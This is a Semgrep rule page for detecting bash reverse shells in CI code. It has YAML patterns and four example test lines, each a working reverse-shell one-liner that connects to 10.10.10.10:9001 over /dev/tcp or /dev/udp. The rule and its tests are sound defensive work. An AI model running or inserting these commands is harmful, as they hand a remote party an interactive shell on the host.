generic.ci.security.bash-reverse-shell.bash_reverse_shell

profile photo of semgrepsemgrep
Author
unknown
Download Count*
LGPL Commons Clause
License

Semgrep found a bash reverse shell

Run Locally

Run in CI

Semgrep CI docs

Defintion

Edit RuleView Source
Open in Playground 
rules:
  - id: bash_reverse_shell
    metadata:
      cwe:
        - "CWE-94: Improper Control of Generation of Code ('Code Injection')"
      category: security
      technology:
        - ci
      confidence: HIGH
      owasp:
        - A03:2021 - Injection
      references:
        - https://owasp.org/Top10/A03_2021-Injection
      cwe2022-top25: true
      subcategory:
        - audit
      likelihood: MEDIUM
      impact: HIGH
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
      vulnerability_class:
        - Code Injection
    message: Semgrep found a bash reverse shell
    severity: ERROR
    languages:
      - generic
    pattern-either:
      - pattern: |
          sh -i >& /dev/udp/.../... 0>&1
      - pattern: |
          <...>/dev/tcp/.../...; sh <&... >&... 2>&
      - pattern: >
          <...>/dev/tcp/.../...; cat <&... | while read line; do $line 2>&...
          >&...;done
      - pattern: |
          sh -i ...<...> /dev/tcp/.../... ...<&... 1>&... 2>&

Examples

bash-reverse-shell.generic

# ruleid: bash_reverse_shell
sh -i >& /dev/udp/10.10.10.10/9001 0>&1

# ruleid: bash_reverse_shell
0<&196;exec 196<>/dev/tcp/10.10.10.10/9001; sh <&196 >&196 2>&196

# ruleid: bash_reverse_shell
exec 5<>/dev/tcp/10.10.10.10/9001;cat <&5 | while read line; do $line 2>&5 >&5; done

# ruleid: bash_reverse_shell
sh -i 5<> /dev/tcp/10.10.10.10/9001 0<&5 1>&5 2>&5